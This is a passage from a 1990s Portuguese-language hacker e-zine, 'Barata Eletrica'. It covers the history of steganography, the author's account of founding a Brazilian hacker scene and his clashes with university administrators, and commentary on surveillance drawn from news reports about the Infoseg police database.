filha do (ex) Presid. Geisel havia dito numa reportagem que gostava das mu-
-sicas do Chico Buarque, exemplo d mais censurados pela ditadura. A  musica
popular brasileira ta' cheia de exemplos desse tipo, onde muda a entonacao,
muda o contexto e a verdadeira mensagem aparece.
     Dizem,  nao sei se e' verdade, que um disco do Milton  Nascimento,  no
tempo  da  Ditadura, escondia um grito clamando "Lamarca"  (deputado  morto
durante a repressao). Pra escutar, era necessario tocar o LP ao  contrario.
O  grupo  "Lingua de Trapo" teria feito algo semelhante: pos  uma  mensagem
"voce esta' estragando seu disco" quando se tocava ao contrario.
     Outros tipos  de  estenografia:  a historia de um grupo de surfista de
um "point" no litoral norte paulista (ou qualquer outro, esqueci de onde li
isso).  A  turma nao aguentava mais a invasao de surfista  de  "escritorio"
tentando se enturmar. Entao mudavam a giria toda semana. Desse jeito sabiam
quem era da area ou tava so' fingindo.
     Sobre formas alternativas de transmissao de mensagem, ha' milhares. E'
o  que  se chama de "transmissao de dados por canais de  baixa  seguranca".
Tipo  comunicacao  entre habitantes de prisoes, internatos,  esses  lances.
Uma das historias mais interessantes e' de um cara que ficou preso na  Ilha
Grande por conta da ditadura do Getulio Vargas. Os prisioneiros nao ficavam
em celas superlotadas como hoje, acredito. Como sempre acontece, o  pessoal
bolou um sistema interno p. se comunicar. Usando baratas. Por incrivel  que
pareca.  Como  se trata de um inseto com o olfato  altamente  desenvolvido,
"sentia" o caminho ate' um pedaco de biscoito com facilidade. Era  amarrado
a  uma linha de papagaio e pronto. Quando chegava ao local, o  receptor  da
"barata"  puxava  o  fio  com a  mensagem.  Nem  os  proprios  prisioneiros
acreditavam  que  um  bicho tao nojento podia ser  adestrado  e  demonstrar
inteligencia, mas a coisa funcionava.
     So'  pra  se  ter uma ideia do alcance das mil e uma  formas  que  uma
mensagem  pode  ser  ocultada, os EUA na 2a  Guerra  tinham  um  verdadeiro
servico  de inteligencia so' dedicado a abrir e  vistoriar  correspondencia
entrando  e  saindo  do pais. Todas as  cartas,  telegramas  eram  abertos.
Tradutores  para  quaisquer linguas conhecidas eram requisitados,  para  se
descobrir  possiveis espioes. Fotos, desenhos, mesmo feitos  por  criancas,
eram  sumariamente  "apreendidos".  Isso  porque  um  desenho  tambem  pode
esconder  informacao, vide o exemplo do fundador do escotismo (durante  seu
tempo  a  servico  da coroa britanica, antes da  primeira  guerra),  Badden
Powell,  fez todo um mapa de fortificacoes alemas disfarcado de desenho  de
borboletas  (o disfarce dele era de "cacador de borboletas").
     Qualquer  carta  contendo algo estranho, ou informacao fora  do  comum
era  "atrasada"  ate' se ter certeza do conteudo inofensivo. Uma  piada  da
epoca fala que um dos encarregados da censura desconfiou de um telegrama do
tipo  "papai  morreu".  Alterou  e enviou outro,  com  o  conteudo:  "papai
faleceu".  Ai'  o  destinatario replicou com a mensagem  "papai  morreu  ou
faleceu?".
     Tudo  isso e ainda assim era e e' complicado. A  Alemanha  desenvolveu
um  "kit"  de fotografia, capaz de reduzir o negativo de uma  foto  ate'  o
tamanho  de  um alfinete, os chamados "micro-pontos". Isso antes  de  1939.
Durante  a  guerra, ha' noticia de na propria Alemanha (durante  o  periodo
nazista),   a  literatura  denominada  "subversiva"  (livros   considerados
"decadentes"  por serem de autores judeus ou contra o regime nazista)  eram
reduzidos fotograficamente e contrabandeados em saquinhos de fermento.
     Dentro dessa briga entre censoresXespioes havia tambem toda uma grande
gama  de  tintas  "invisiveis"  para quem le,  mas  que  com  os  reagentes
adequados,  tornam-se  visiveis para o destinatario da mensagem.  Coisa  De
crianca, tipo usar uma pEna para escrever com sumo de limao ou outra  fruta
citrica  e  esquentaR  delicadameNte o papel dEpois, para  ver  a  mensagem
aparecer.  A coisa chegaVa ao ponto de se inserir mensagens dentro  de  uma
folha  de papel, a semelhAnca daquela tirinha que existe  para  diferenciar
notas faLsas de verdadeiras.
     E'  um  assunto bem vasto. Ha' inumeras formas de  se  esconder  texto
dentro  de  texto. O unico problema e' que se precisa de um  volume  enorme
de caracteres p. que um pequeno volume passe despercebido. Por exemplo,  no
paragrafo  anterior,  ta'  o  meu  nome  escondido,  basta  procurar  pelas
maiusculas que estao fora de lugar, logo depois da palavra "mensagem".
     O  hit atual da esteganografia e' a ocultacao de mensagens  em  fotos.
Pra  usar um palavriado mais tecnico: uma foto e' um arquivo  binario,  com
uma  quantidade enorme de bits, donde a alteracao de um pequeno numero  nao
aparece. Uma imagem comum de 8 bits, 256 cores, usa 8 bits para representar
um  pixel ou elemento de gravura digitalizada, sendo que ha' imagens de  32
bits  que  permitem milhares ou milhoes de cores. Uma imagem digital  de  8
bits 480 por 100 em teoria pode ter 5000 caracteres de texto dentro e  pode
ser  criptografada com pgp pra ficar mais segura ainda, embora  metodos  de
"procura"  ja'  tenham  sido  desenvolvidos  para  achar  estas   mensagens
escondidas (dados "sugados" de um URL esquecido).
     Existem varios softwares na rede que possibilitam esconder arquivos em
imagens .GIF, .JPG e .BMP . Nenhum dos quais ideais para este tipo de  uso,
mas de qualquer forma, podem quebrar um galho. Apesar de que a imagem  fica
alterada  e  em  alguns  casos, distingue-se o  lance.  Aumenta  o  arquivo
horrores.
     O mesmo pode ser feito com transmissoes de video e de audio que  agora
sao o hit de paginas na Web. Um exemplo para fotos gif pode ser  encontrado
na pagina de Romana Machado, autora (ate' gostosa, por sinal) do Stego  for
Mac,  um  programa feito para Mac porem disponivel para Java,  que  permite
inserir  texto em gifs, no http://www.fqa.com/romana . Embora este tipo  de
mensagem  tenha sua utilidade, e' um segredo como qualquer outro.  Uma  vez
suspeitado,  pode  ser ate' mais perigoso, ja' que o excesso  de  confianca
pode facilitar a "escuta" de mensagens, no que e' chamado pelos alemaes  de
"funkspiel".  A esteganographia ou ocultacao de mensagem so'  e'  realmente
util quando nao se suspeita dela.

                  HISTORIA RESUMIDA DO BARATA ELETRICA ou
                       COMO COMECAR UMA CENA HACKER
                       ============================

Artigo  publicado  na  edicao Summer96 da revista 2600  -  Hacker  Quaterly
     Minha Autoria - minha traducao - tudo isso abaixo e' material que  ja'
comentei em numeros anteriores, mas este e' o texto integral, que saiu numa
publicacao estrangeira, que e' referencia pro Computer Underground do mundo
inteiro,  alem de me render uma conta internet, a  curupira@2600.com.  Alem
disso, acho que os caras gostaram tanto que o Barata Eletrica tambem  esta'
disponivel  la' no ftp.2600.com. O que esta' entre parenteses,  obvio,  nao
saiu no texto original, mas acrescentei por uma questao de "pingos nos iis"

Tudo comecou em Outubro de 94. Havia o "Hackers and Virus Writers Congress"
na  Argentina,  e foi o primeiro encontro do seu tipo na  America  do  Sul.
Minha   experiencia  com  a  internet  e  minha  sede   por   conhecimentos
relacionados  a  virsu me levou ate' la'. Eu tinha cerca de  oito  anos  de
manuseio de computadores e muito pouca sabedoria das coisas acontecendo  em
outros  lugares.  Qual  a surpresa de encontrar uma  cena  hacker  la'.  No
Brazil,  do qual falei num artigo anterior, os grupos que faziam esse  tipo
de coisa nunca divulgavam seus conhecimentos. Os hackers argentinos  tinham
sua  propria  revista "Virus Report" e cerca de quatro  ou  cinco  e-zines,
todos  eles lidando com a escrita de virus e alguns outros  assuntos.  Eles
tambem  tinham  encontros 2600 (tipo de encontro de hackers  toda  primeira
sexta-feira de cada mes).
     Quando  voltei  para  Sao  Paulo, ainda maravilhado  pelo  que  vi  no
Congresso,  eu disse a meus amigos no trabalho a respeito e  alguns  deles,
gente  ate'importante,  pensaram que formar um congresso  de  hackers  aqui
poderia ser uma boa coisa, se pudesse ser um encontro positivo. Minha turma
nao  tava  mais  por  ai'.  O lugar  onde  costumavamos  nos  encontrar,  o
laboratorio  de  Computacao  da Escola Politecnica, foi  substituido  e  os
rapazes   arrumaram   bons  empregos  e  foram   substituidos   por   novos
frequentadores,  nenhum  dos quais me conhecia. Eu tentei fazer  contato  e
descobri  que,  sim,  eles tinham um tipo de  organizacao  propria,  tambem
tinham  acesso internet, mas nao, nao tinham nem o tempo nem a  vontade  de
explorar  tudo.  O especialista em virus com quem  conversei  sabia  varios
truques, mas nao tinha o conhecimento da situacao la' fora, nem os arquivos
sobre  a  fabrica  de virus Bulgara ou o AIDS  trojan.  Nada.  Eles  tinham
bastante  experiencia  pratica.  Cada  um tinha  algo  no  qual  resolveram
trabalhar,  mas  nao  muito a fundo. Muitos poucos no meu  pais  podem  ler
ingles  o  bastante para ler todos os e-zines como o PHRACK. A  pior  coisa
e'  que eu fiz o meu "contato" assim meio do nada, sem muito o que  mostrar
nem pedindo por conhecimento. Um ano surfando na rede (via linha  dedicada)
foi muito ruim pra mim, em termos de sociabilidade. Os caras so'  confiaram
em  mim  mais  ou  menos. Nada alem disso.  Nao  copiariam  os  discos  com
informacaoes  que preparei para elesnem iriam partilhar seus  conhecimentos
comigo - so' uns bytes aqui e ali (alias, ate' hoje isso nao mudou - nota).
Fizeram  ate' um talker, o primeiro do Brasil (carpa.ciagri.usp.br  -  hoje
sei  la'  o que ta' rolando - ainda to^ meio p(*) c/ um dos caras q. montou
o lance:"enrolou" que ia escrever  sobre o assunto e e' por isso que o nome
dele nao aparece - maldade), que poderia ter sido uma janela p. fazer  mais
contato,  mas decidi por uma outra forma de contato.  Eu pensei que   seria
necessario  "educar"  os novos integrantes, de forma que  eles  pelo  menos
partilhariam alguma coisa de etica e de mentalidade hacker.  Muitos nao nao
compreendem a importancia de tracar uma linha entre o que e' certo e o  que
e' errado. A imprensa nao publicaria artigos mostrando meus pontos de vista
sobre  o  assunto  porque (naquela epoca) muito  pouca  gente  sabia  sobre
aquilo.  E  a preparacao para tal congresso demandaria muita  cobertura  da
imprensa.
     Eu comecei fazendo uma lista de correspondencia manual. As pessoas  me
mandariam  cartas pedindo para entrar na lista e entrariam para um  "alias"
(ou  lista) e eu enviaria um ou dois arquivos por dia. Apenas  dicas  sobre
como  encontrar isso ou aquilo e um arquivo ou outro  sobre  acontecimentos
envolvendo   hacking.   Ate'comecei   a  por  um   anuncio   no   newsgroup
soc.culture.brazil.   Mais  tarde, fiquei sabendo da  esquina-das-listas  e
montei  a  lista  "hackers"  la'. E por volta da  mesma  epoca  convidei  a
"rataiada" para comecar um encontro.
     Planejei  igualmente um pequeno informativo para passar as  dicas,  de
forma  a nao ter que repetir coisas como: "Porque estou fazendo  isso",  "O
que  e' hacking", etc . O nome era importante (hoje ja' nao acho tanto).  O
unico que "pegou" foi Barata Eletrica. Meu chefe, entre todos, foi o  unico
que  pegou de cara o significado. Me perguntou: "Porque nao algo que  fosse
acima  da  terra?". Fiz 100 % sozinho.(Pedi a colaboracao  da  mocada,  que
repetiu o que repete ate' hoje: "To com prova, tenho trabalho pra entregar,
esta semana ta' cheia, nao sei fazer") O primeiro numero foi sobre  algumas
coisas que achava que deveriam ser de conhecimento comum como definicao  de
hacking, qual era o meu objetivo, como e porque estava fazendo isso,  etc..
Um  fa~ da revista Phrack nao leria isso, com certeza. Foi provavelmente  o
primeiro fanzine em lingua portuguesa publicado na Internet. Naqueles dias,
os  jornais falavam sobre a rede, mas nao era ainda coisa  disponivel  fora
das  universidades  (pra se ter uma ideia, modem de 2400 era  o  comum).  A
pessoa tinha que estar envolvida com um projeto de pesquisa para  conseguir
o  acesso ou aceitar um email comercial via UUCP. Compuserve  era  qualquer
coisa quase desconhecida (hoje ouvi falar que ja' existe - do meu ponto  de
vista, infelizmente). As pessoas tinham que me mandar email para receber  o
fanzine.  O primeiro foi completado em cima da hora porcausa do  "provavel"
encontro   ao  qual  poucos,  bem  poucos  compareceram.  Me  deixou   meio
desapontado. Mas o pior aconteceu um tempo depois.
     Ninguem  da  Administracao  tinha  se incomodado  com  a  minha  lista
informal,  nem com a lista "hackers" ou mesmo o fanzine em si. Mas  ai'  eu
dei a dica para um jornal (Folha de Sao Paulo, Coluna NETVOX, a segunda  ou
terceira vez que tal coluna apareceu, se nao me engano). As pessoas ouviram
falar  da minha lista depois disso. Destino ou nao, tava usando a  camiseta
da revista 2600 - Hacker Quaterly nas duas ocasioes - no dia em que a  dica
apareceu no jornal e no dia em que a administracao me chamou (de uma  forma
simples,  suspendendo minha conta) para perguntar sobre a minha lista.  Nao
que  nao  me conhecessem. Eu ERA um dos caras com o maior numero  de  horas
usando  a  rede  na Universidade de Sao Paulo (simples:  o  laboratorio  de
computacao  ficava aberto a noite inteira, acesso via linha  dedicada,  era
muito comum eu entrar meio-dia e sair as 7:00.. da manha do dia  seguinte).
Muito bom o fato de que nao podiam me acusar de tentar advinhar a senha  de
root.
     As pesssoas eram paranoicas naquela epoca. Mas apesar de estar  usando
uma camiseta da 2600 com uma blue box estampada, (sim, tambem acharam muito
ironico), apenas me disseram para nao usar os computadores da  Universidade
como  veiculo  de transmissao. Nunca mais. Foi duro. Mas mais  tarde,  isso
acabou  virando a melhor coisa que poderiam ter me pedido. (Eu  estava  com
preguica)  Isso  me forcou a procurar por um site ftp  (naquele  tempo  nao
havia essa de geocities, internet comercial era novidade ate' nos EUA, voce
tinha  que  pedir  para  que algum lugar  aceitasse  colocar  seu  material
disponivel  para  ftp  ou gopher, acho que o comum era  achar  netscape  na
versao 0.98, so' pra referencia). De todos os lugares, tentei pedir para  a
EFF - Electronic Frontier Foundation. O mesmo lugar de onde eu tinha  feito
download  de  tudo  quanto  e'coisa, horas a  fio.   Para  minha  surpresa,
aceitaram.  Me  salvou muitas horas, mandando o Barata Eletrica  por  email
para  uma  conta  internet Freenet (saudade das BBS  internet..)  e  depois
mandando  via email para 80 pessoas no Brasil (a conta ficava na  Alemanha,
as  vezes demorava dez segundos para as letras aparecerem na tela).  Sempre
havia  gente  nova ouvindo sobre meu fanzine. Eu ate' fiz um  programa  que
fazia  a mala-direta de forma automatica. Mas mesmo assim, eram  quatro  ou
cinco  horas  de trabalho para mandar um novo numero do fanzine  para  todo
mundo que pedia.
     Mais  tarde  a  Universidade Federal de Santa  Catarina  concordou  em
colocar o zine no seu URL (onde esta ate' hoje). Pena que nao era em  html.
E  outra universidade (ftp.ufba.br - valeu sluiz) pos no seu site  ftp.  Os
participantes da lista "hackers" fora da minha Universidade cresceram  ate'
o numero de 200 e mais importante, um cara me pediu para ajudar num  artigo
sobre  hackers  para a revista SUPER INTERESSANTE (Materia do  Heitor e  do
Ricardo).  Havia  ate' mesmo uma foto minha e o URL do meu fanzine.  A  boa
coisa  e' que o reporter realmente entendeu meu ponto de vista e  o  artigo
nao colocou os hackers como um tipo de inimigo publico.
     A midia, a maior parte do tempo, nao se preocupa  em aprender sobre um
assunto qualquer. Eles constroem em cima de algo que alguem escreveu  sobre
isso  anteriormente.  Uma boa coisa sobre o meu e-zine e'que  ele  continha
dados  que  ajudaram  alguns reporteres a escreverem  sobre  esse  assunto.
Quando  um cara foi pego na Universidade de Pernambuco, a revista VEJA  nao
chamou  ele de hacker, mas de pirata do computador. Em outros  dois  break-
ins,  a mesma coisa aconteceu. Os caras ate' colocaram uma diferenca  entre
"hacker" e "dark-side-hacker", a mesma diferenca estressada no meu fanzine.
     Me  disseram  que  por causa do meu fanzine, seria  sempre  banido  de
conseguir  acesso  de  super-usuario (como  acontece  normalmente,  o  cara
resolve te aproveitar) legalmente, mesmo no meu lugar de trabalho. Os caras
na administracao estavam paranoicos a meu respeito. Nao interessava se  meu
zine estava sendo imitado por outros caras em outras universidades,  alguns
ate' pedindo ajuda.
     Hoje (e'poca em que escrevi isso, inicio de 96) ha' outro cara  tambem
fazendo um hacker zine, muito mais agressivo do que o meu (era o  hack.br).
A  lista  "hackers"  alcancou 600 pessoas (na epoca em que  escrevi  era  a
terceira em numero e se nao fosse um defeito que fazia o software da  lista
apagar aleatoriamente inscritos, seria talvez a primeira). As pessoas estao
apenas  comecando a aprender sobre o assunto. Quase toda semana, alguem  me
pede para ensinar como usar o SATAN ou algum tipo de software de  cracking.
Outros  me  pedem  algo mais complicado, como ser seu  guru  ou  mestre.  A
maioria  dos  que pedem estao entre os 14 e 19 anos de idade. Uma  vez  que
meus  artigos  falam  de como e' dificil fazer  isso  sozinho,  as  pessoas
oferecem ajuda e o fanzine esta sendo distribuido em tudo quanto e'  lugar.
Mesmo  a BBS do lugar onde eu trabalho me pediu permissao para colocar  la'
(coisa que a Administracao tinha me pedido pra nao fazer). Este sucesso  e'
algo que ainda nao entendi direito.
     Para escrever os artigos, tive que deixar de hackear, tanto por  falta
de  tempo  como por seguranca. Os artigos, por sinal, sempre  bem  simples,
para evitar qualquer tipo de problemas legais. Eu fiz a besteira de usar  o
meu  proprio  nome, ao inves de um apelido. Tentei outra  vez  organizar  o
pessoal num boteco e (pra evitar excesso de lammers) ia informar a  tchurma
do  local  e hora pela internet. A Administracao tava de  olho  e  resolveu
"suspender"  minha conta exatamente ha' dois dias desse novo encontro  e  a
coisa  melou.  Nao aconteceu porque nao pude enviar os detalhes.  A  ultima
coisa  que  aconteceu  (na epoca q escrevi isso) foi a  traducao  do  livro
"Hacker  Crackdown" do Bruce Sterling. Tava juntando gente via email,  para
traduzir  parte  por  parte o livro. Cada um iria  traduzir  cinco  ou  dez
paginas para o portugues. Um dia, minha conta foi craqueada e reclamei pros
caras  da administracao. Para mim, so' podia ser o trabalho de  alguem  com
status de Super-Usuario ou administrador.
     Eles foram checar os arquivos na minha conta. Meu nome ja'  estava  na
lista  negra,  desnecessario  dizer.  Quando o  cara  que  checou  a  coisa
encontrou o arquivo de nome "crac.gz", ele nao se incomodou em checar o que
tinha  dentro.  Ao inves, a conta foi bloqueada. E mais tarde,  uma  mulher
(loira  tingida)  veio me avisar que o unico jeito de conseguir  que  minha
conta "voltasse" seria abrir, entre testemunhas, aquele arquivo  especifico
(lembro ate' hoje as palavras: "o sistema deve ser protegido" - mais  tarde
a  coisa  mudou  um pouco). Eles pediram para mim escrever  num  papel  "la
raison  d'etre" do arquivo. Assinado, ponto. Um cara da alta  administracao
iria checar e me devolver o uso da conta. Um dia desses, talvez num mes (na
verdade, levou tres meses e alguns dias, tinha dez megabytes de email e  um
especifico  falando que minha caixa de email estava lotada e eu  ia  perder
tudo se nao limpasse).
     Eu  ganhei  uma verdadeira turma de admiradores de hackers de  todo  o
Brasil  (talvez ate' alguns peritos de verdade) e (quase) perdi meu  acesso
internet (do qual dependia e depende meu trabalho ate' hoje). E' algo a  se
falar.
     Aviso  aos  navegantes, entao: Se voce esta' pensando  a  respeito  de
armar uma cena hacker no seu pais (a revista 2600 e' ponto de referencia em
tudo  quanto e' canto do mundo), nao faca isso sozinho. Informe-se sobre  a
legislacao  (no  caso  do Brasil, vai cair uma  pesadissima,  me  falaram).
Sempre ajuda. Use quaisquer listas disponiveis e facam-nas funcionarem para
voces.  Planeje  uma  linha  de  acao. E' um  processo  que  nao  pode  ser
apressado. Armazenae o email que voce receber, mas criptografe tudo. Use  a
imprensa  comum, quando disponivel. Tente fazer amigos entre os  reporteres
(coisa as vezes dificil). Use talkers, IRC e ate' mesmo telefone para fazer
contatos.  Eu usei apenas correio eletronico e um fanzine hacker. Nao e'  o
bastante.  Se voce tiver problemas, divulgue. Isso nao vai piorar a  coisa.
Tente  escrever bons artigos (pelo menos algo que consiga reler).  Se  usar
fontes  estrangeiras, tenha certeza de que entendeu o que leu.  Nao   pense
que pode fazer dinheiro com isso so' porque ficou famoso (isso e' talvez  a
maior  ilusao). Tente (porem) manter seu emprego, sua formatura  (graduacao
ou  pos)  e seus amigos. Ira' (com certeza) precisar deles  alguma  vez  no
futuro.  Se  sua  conta  for  "congelada",  nao  chore.  Tenha  outra   pra
substituir. E acima de tudo, nao perca a esperanca. A coisa e' distribuir a
semente. O resto e' uma questao de tempo.

ADENDO: Atualmente, ja' consegui um trabalho ajudando a montar um  servidor
internet  (anonimamente). Tem um encontro 2600 rolando em  Belo  Horizonte,
perto  de  um lugar chamado Pelego's Bar (nao perguntem que  nao  sei  onde
fica). Tinha um no RJ, mas saiu fora da lista do 2600 - Hacker Quaterly.  O
local  onde  eu ia tentar de novo montar a reuniao de  hackers  mensal  foi
posto  a venda recentemente. O congresso internacional de hackers ainda  e'
projeto.  E' muito dificil tirar os caras do computador aqui em Sao  Paulo.
Tudo e' muito longe. O cara fala que vai e nao aparece nem fala que nao vai
aparecer.  Varios clubes de hackers estao rolando pela rede. Lotados,  ja'.
Existe  a  lista fussadores, mas tambem dificil de entrar e  lotadassa.  Os
maiores  problemas sao excesso de gente querendo se enturmar para  aprender
besteira  (so'  o minimo necessario para se chamar de hacker) ou  falta  de
tempo da mocada mais capacitada. Parece que vai rolar uns encontros por ai'
de mocadas de BBSes underground, mas nao estou por dentro. Como nao  acesso
nada fora da Internet, so' se alguem me fornecer informacao vou me inteirar
disso,  o que nao quer dizer que o Brasil inteiro, atraves do BE va'  ficar
sabendo. Ta' assustando a quantidade de gente que quer se enturmar so'  pra
falar que e' hacker. So' pra falar que e'. Como se fosse necessario...
     Parece  que  tao  rolando uns zines novos por ai'.  Mas  como  sao  de
caracteriscas  proprias e nao pediram nenhuma especie de divulgacao,  fazer
o que? O Barata Eletrica ta' tao difundido, tao praga em tudo quanto e' BBS
da vida, que nao pode ser realmente chamado de uma publicacao  underground,
no sentido da palavra. Existem BBSes (nao internet) como a Medusa e outras,
que  sao responsaveis por nucleos nacionais de distribuicao de fanzines  de
virus (um tipo de publicacao que ta' ficando mais popular e que tambem ate'
engloba  hacking).  Mas  divulgar significa lotar ainda  mais  umas  poucas
linhas telefonicas que o BBS  nem sempre tem.(E tambem, dependendo do caso,
submeter o dono da linha telefonica a algum tipo de perseguicao. Nao pensem
que isso dai' nao acontece nem que nao esta' sendo vigiado, porque  esta').
E  tem o lance de propaganda gratuita que nao e' legal fazer se  o  produto
nao for tambem gratuito.
     Em  alguns  casos, se a BBS estivesse afim de  aparecer,  ela  propria
faria uma publicacao.  Alguns fanzines como o NUKE, ou a  PHRACK  comecaram
como uma forma de difundir a BBS underground do grupo. Um detalhe e' que no
caso  da PHRACK a informacao que a revista continha varias vezes era  falsa
ou  incompleta. Isso e' comum pacas. O cara e' que tinha que se virar  para
completar a parte que faltava. E as informacoes realmente interessantes, se
desatualizam  rapidamente.  Dai'  a  utilidade  de  listas  como  a   lista
"hackers".  Nada  impede  que novos clubes de hackers  sejam  criados  para
intercambio de informacao. So' alguns por enquanto descobriram essa  ideia,
de  criar  suas proprias "panelinhas". Quando  houver  clubes  suficientes,
talvez  as  pessoas comecem a se reunir em locais, da mesma  forma  que  se
reunem  em  chats  da  UOL e IRC, que pelo que ouvi falar  e'  o  que  mais
acontece.
     A  traducao do livro Hacker Crackdown ainda vai rolar, assim como  vai
rolar  o  meu  projeto de uma conferencia aqui  no  Brasil.  Os  convidados
estrangeiros,  isso ta' quase certo. Os brasileiros ainda sao  uma  duvida.
O  meu  chefe ainda tem interesse  no assunto, faltam apenas  rolar  varios
detalhes.  Meu maior medo e' montar isso sem ter certeza de  publico,  como
rolou  nos encontros. Quem tiver interesse, fique ligado na lista  hackers.
O dia que rolar, vai aparecer a noticia la'.


              PARA A SUA PROTECAO: GRANDE IRMAO ESTA' VINDO..
              ===============================================

New Number 2- "INFORMATION, WE WANT INFORMATION"
The Prisoner- "WHO ARE YOU?"
NN2 - "THE NEW NUMBER 2"
TP - "WHO'S NUMBER ONE?"
NN2 - "YOU ARE NUMBER SIX"
TP - "I AM NOT A NUMBER, I AM A FREE MAN!!!"
NN2 - "HA! HA! HA!"

     O  trecho acima foi tirado do seriado "O Prisioneiro" e inserido  numa
cancao  do grupo de heavy metal "IRON MAIDEN". E' tao antigo  esse  seriado
que  nem  assisti (do tempo em que o Jo Soares era magro). O que  eu  soube
seriado, o sujeito era sempre preso e interrogado por nao se sabe quem  nem
sobre  o  que (os caras nao queriam dar qualquer tipo  de  informacao,  so'
receber).   Um pouco pior do que "O Processo" de Kafka. Mas como se viu  em
Diadema,  no nosso pais, a ficcao ta' muito aquem da realidade. O cara  la'
foi  morto  so' porque apareceu no lugar errado, na hora errada.  Isso  nao
acontece   so' aqui, obvio. Mas nao e' consolo.
Algumas noticias tiradas dos jornais ESTADO DE SAO PAULO e ZERO HORA.  Acho
que todo mundo devia prestar mais atencao no jornal. Infelizmente por falta
de grana, tive que cancelar a assinatura. Mas durante o periodo em que  fui
leitor regular, peguei algumas perolas que lembram um pouco aquele livro do
George  Orwell, "1984". Num pais que ja' teve 8(?) Constituicoes,  sei  la'
quantas ditaduras e casos como os de Diadema (o tipo de coisa que  ja' ouvi
muito antes e ate' da boca de turista argentino), as pessoas deixam  passar
noticias tao importantes e pior: nao fazem nada, nao sabem de nada.
Perder  os  sentidos num hospital qualquer hoje pode ser o  inicio  de  uma
doacao de orgaos, por exemplo. Talvez sob pretexto de combater o trafico de
drogas e outros crimes, baixem uma lei obrigando a tatuacao de um numero de
registro no braco.
     Who knows? Ia colocar, mas perdi  recorte de uma reportagem comentando
que algumas escolas do primeiro e segundo graus estavam testando um  cartao
eletronico  que  possibilitava aos pais saberem o que seus  filhos  estavam
comendo  no intervalo das aulas. Ja' nao basta que a crianca que entrar  na
escola receba um numero de RG.  Cada gasto dos alunos (que estariam  usando
o tal cartao) ficava registrado no chip e depois essa informacao podia  ser
debitada  na conta do pai ou coisa do genero. Em outras palavras, o  garoto
pede um refrigerante, chega em casa, o pai da' aquela bronca porque acha um
absurdo gastar dinheiro com porcarias. E', de menino que se torce o pepino.
Quando  adulto,  esse  menino  nao vai ficar surpreso  se  toda  sua  conta
bancaria  for monitorada pela empresa, que quer saber se ele  ta'  gastando
grana  com  coisas  saudaveis ou de repente ta' planejando  algo,  tipo  um
desfalque,  p.  pagar as dividas.. deve ficar mais facil negar  um  aumento
quando se sabe que o funcionario ta' bem de vida.
     As pessoas podem ate' me achar paranoico, viajando na maionese. Mas na
Inglaterra,  uma  lei que permitia ao cidadao saber o que o  governo  sabia
sobre  ele foi alterada. O cara so' recebe isso meses depois. As  empresas,
ao  contratar  gente, "pediam" aos candidatos a  determinado  emprego,  que
"fornecessem"  tal  papel, alem do Curriculum Vitae. Na  pratica,  seria  o
Servico  Secreto  checando  se o cara era tudo aquilo  que  dizia.  Com  um
adendo:  um sujeito do Servico Secreto e' um funcionario  publico  tentando
achar uma "conspiracao" pra provar que merece sair do servico de rua. Donde
se pode imaginar qe coisas do tipo "namorada do PT" poderia virar "ligacoes
com  a  esquerda".  Como o pessoal na Inglaterra se  revoltou,  fizeram  um
periodo  de  espera  de alguns meses entre o pedido do tal  "dossier"  e  a
entrega. Detalhe: la' eles parece que implantaram um sistema de  informacao
digital sobre cada cidadao, como pretexto p. combater o terrorismo. E' mais
facil invadir a privacidade de todo mundo do que sair da Irlanda do  Norte,
parece.  E ai' fica aquele bando de caras, que achavam que iam  ser  "James
Bond",  vigiando a amante do diretor, aquele filho do deputado ou mesmo  um
cara qualquer que se encaixa no perfil de ameaca ao trono ingles.
     Ai' acontece qualquer coisa e algum tempo depois um filme chamado  "Em
Nome do Pai", aparece e faz sucesso nas bilheterias.
     Se  isso  nao  te  assusta, imagina entao  que  e'  praxe  no  Brasill
organizar   uma  reforma  qualquer  e  usar  o  modelo  de  um  pais   mais
desenvolvido,  leia-se  inclusive a Inglaterra, como exemplo.  Entao,  PODE
ACONTECER COM VOCE.

REDE DE INFORMACOES INTEGRARA' POLICIAS DO PAIS (23-01-97 pg C11)
Sao  Paulo  e  Rio Grande do Sul testam desde ontem  Infoseg,  que  permite
localizar criminosos.
Brasilia  - Desde ontem, a policia esta' testando o Programa  Nacional  das
Informacoes  de  Justica  e Seguranca  Publica  (Infoseg),  instalado  pelo
Ministerio da Justica para localizar, com mais rapidez, criminosos em  todo
o  Pais.  Interligado a uma central na Policia Federal,  o  projeto  tambem
esta'  funcionando  no Rio Grande do Sul. O acesso aos dados  usa  o  mesmo
sistema  da  Internet,  com um circuito privado  que  sera'  instalado  nos
Estados.
     A  policia  paulista tera' disponivel informacoes de  4,6  milhoes  de
pessoas cadastradas pelas Secretarias de Seguranca Publica de todo o  Pais.
(Nota do Barata Eletrica: Essas secretarias sao os orgaos responsaveis pela
emissao  do  RG  de  cada cidadao) "Se uma pessoa e'  presa  no  Acre,  por
exemplo,  todas as suas informacoes serao repassadas para o banco de  dados
da   policia  paulista  e  da  Policia  Federal",  explica  o  diretor   do
departamento  de Acoes de Seguranca Publica, general Dyonelio  Morosini.  O
sistema ainda sera' adotado no Poder Judiciario e penitenciarias.
     A  policia paulista tambem contara' com dados sobre  carros  roubados,
pessoas desaparecidas, armas de fogo, fotos e impressoes digitais,  crimes,
inqueritos e mandados de prisao.(EDSON LUIZ)

TRECHOS DO PRONUNCIAMENTO NO PROGRAMA DE RADIO "PALAVRA DO PRESIDENTE"
(28-1-97 - copiado do Jornal ESTADO DE SP - pg C6)
"A  nossa  meta  para 97 e' reunir informacoes criminais,  para  colocar  a
disposicao das autoridades que cuidam da seguranca.
     Nos  acabamos  de lancar o projeto piloto do  Programa  de  Integracao
Nacional  das Informacoes de Justica e Seguranca Publica, o  Infoseg.  Este
programa  reune, em um so' banco de dados, todas as  informacoes  criminais
das Policias Federal, Civil e Militar, do Ministerio Publico, do Judiciario
e  do  Sistema  Penitenciario de cada Estado. Isso  significa  que,  se  um
delegado  prender  uma  pessoa no interior de um  determinado  Estado  pode
buscar  informacoes sobre ela e saber se ja' cometeu algum crime  em  outro
Estado, se e' procurada pela policia, se responde a algum processo.
     Um juiz, ao examinar os processos, tambem podera' entrar no sistema  e
conseguir  a ficha completa do criminoso. Os procuradores  que  pretenderem
apresentar  denuncia, tambem conhecerao todas as acusacoes que pesam  sobre
aquele cidadao em qualquer parte do Pais.
     Em  resumo,  a  integracao vai facilitar o trabalho da  policia  e  da
Justica na perseguicao aos criminosos que mudam de Estado a toda hora.
     Nesta primeira fase, o Infoseg vai integrar 4,6 milhoes de informacoes
da Policia Federal do Rio Grande do Sul e de Sao Paulo. [..] Ja' repassamos
